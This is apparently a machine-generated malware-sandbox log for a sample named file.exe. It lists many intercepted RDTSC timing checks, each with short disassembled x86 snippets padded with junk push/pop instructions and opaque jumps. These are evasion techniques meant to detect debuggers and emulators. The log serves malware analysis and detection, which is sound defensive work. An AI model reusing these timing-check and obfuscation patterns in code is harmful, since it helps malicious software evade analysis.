Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C792B5 second address: C792DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F626941E956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jnp 00007F626941E956h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F626941E961h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C743E4 second address: C743E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C75384 second address: C7538A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C77505 second address: C7750E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7B38B second address: C7B3A6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F626941E960h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7B3A6 second address: C7B3FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F6268DAF3C8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 je 00007F6268DAF3C6h 0x0000002b mov edi, dword ptr [ebp+122D26B4h] 0x00000031 push 00000000h 0x00000033 jmp 00007F6268DAF3D5h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jbe 00007F6268DAF3CCh 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7B3FC second address: C7B400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7D45C second address: C7D460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7D460 second address: C7D466 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7A468 second address: C7A472 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6268DAF3CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7A55B second address: C7A55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E54F second address: C7E553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7D5E3 second address: C7D5E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E715 second address: C7E719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E719 second address: C7E731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F626941E95Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C828C9 second address: C828E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8C90F second address: C8C93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F626941E956h 0x0000000a js 00007F626941E956h 0x00000010 popad 0x00000011 push esi 0x00000012 jnl 00007F626941E95Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F626941E95Ah 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8C93D second address: C8C941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8C941 second address: C8C95D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E968h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8C108 second address: C8C10C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8C10C second address: C8C112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8FB9D second address: C8FBA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8FBA2 second address: C8FBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8FBA8 second address: C8FBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnl 00007F6268DAF3D0h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8FBBD second address: C8FBF0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jbe 00007F626941E95Eh 0x0000000e ja 00007F626941E958h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d jmp 00007F626941E963h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8FBF0 second address: C8FBF5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8FCE9 second address: C8FD18 instructions: 0x00000000 rdtsc 0x00000002 js 00007F626941E956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F626941E967h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push edx 0x0000001b pop edx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8FEF2 second address: C8FEF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C96763 second address: C96769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C96769 second address: C9676F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9676F second address: C96778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C96778 second address: C96788 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6268DAF3C6h 0x00000008 jp 00007F6268DAF3C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C96788 second address: C9679D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F626941E958h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F626941E960h 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C959C7 second address: C959E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C959E4 second address: C959EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C95CC5 second address: C95CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C95CC9 second address: C95CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C95CCD second address: C95CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C95CD3 second address: C95CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F626941E956h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9625B second address: C9625F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9625F second address: C96294 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F626941E956h 0x00000008 jmp 00007F626941E969h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F626941E960h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C96404 second address: C96408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C965B9 second address: C965C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C965C2 second address: C965C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C965C8 second address: C965CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9A874 second address: C9A878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9A878 second address: C9A889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F626941E95Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9A889 second address: C9A899 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6268DAF3CAh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9AA0C second address: C9AA10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9AA10 second address: C9AA20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F6268DAF3C6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9AA20 second address: C9AA30 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F626941E956h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9AB89 second address: C9ABB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D7h 0x00000007 jmp 00007F6268DAF3CAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9ABB2 second address: C9ABDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E95Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F626941E962h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9ABDD second address: C9ABF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B007 second address: C9B041 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007F626941E956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 js 00007F626941E95Ch 0x00000018 js 00007F626941E956h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F626941E969h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9A56A second address: C9A59A instructions: 0x00000000 rdtsc 0x00000002 js 00007F6268DAF3C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007F6268DAF3C6h 0x0000001c jmp 00007F6268DAF3D4h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9A59A second address: C9A59E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B30E second address: C9B316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B316 second address: C9B331 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F626941E965h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B331 second address: C9B33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F6268DAF3C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B33D second address: C9B341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B4BF second address: C9B4D9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007F6268DAF3C6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F6268DAF3D8h 0x00000012 jne 00007F6268DAF3D2h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B945 second address: C9B955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F626941E956h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B955 second address: C9B966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 js 00007F6268DAF3CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B966 second address: C9B973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B973 second address: C9B984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6268DAF3CBh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2026 second address: CA2035 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2035 second address: CA2048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3CFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2048 second address: CA204E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA204E second address: CA2058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F6268DAF3C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0D6A second address: CA0D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jp 00007F626941E956h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0D7D second address: CA0D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0D85 second address: CA0D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0F1D second address: CA0F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA1ABB second address: CA1AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jng 00007F626941E958h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F626941E95Bh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA1AD9 second address: CA1ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4DC6F second address: C4DCC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F626941E956h 0x00000009 jbe 00007F626941E956h 0x0000000f jmp 00007F626941E960h 0x00000014 jmp 00007F626941E965h 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F626941E95Fh 0x00000020 jmp 00007F626941E961h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C25B2E second address: C25B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C25B32 second address: C25B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F626941E956h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA51DC second address: CA51E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C27624 second address: C27646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626941E967h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C27646 second address: C2764A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2764A second address: C2764E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD7D2 second address: CAD7DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD7DC second address: CAD7E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C67EF1 second address: C67EFB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6268DAF3CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6835E second address: C6839B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F626941E968h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 jns 00007F626941E965h 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6839B second address: C683D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F6268DAF3C8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov edx, edi 0x00000023 push 4C11AB11h 0x00000028 push eax 0x00000029 push edx 0x0000002a jg 00007F6268DAF3C8h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C684CE second address: C684D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C68C2B second address: C68C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C68DA6 second address: C68DBB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F626941E958h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C68DBB second address: C68DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007F6268DAF3C6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C68DD6 second address: C68DFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jne 00007F626941E95Eh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F626941E956h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C68323 second address: C6835E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 js 00007F6268DAF3C6h 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e ja 00007F6268DAF3DFh 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push ecx 0x00000019 pushad 0x0000001a ja 00007F6268DAF3C6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CACAB4 second address: CACAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
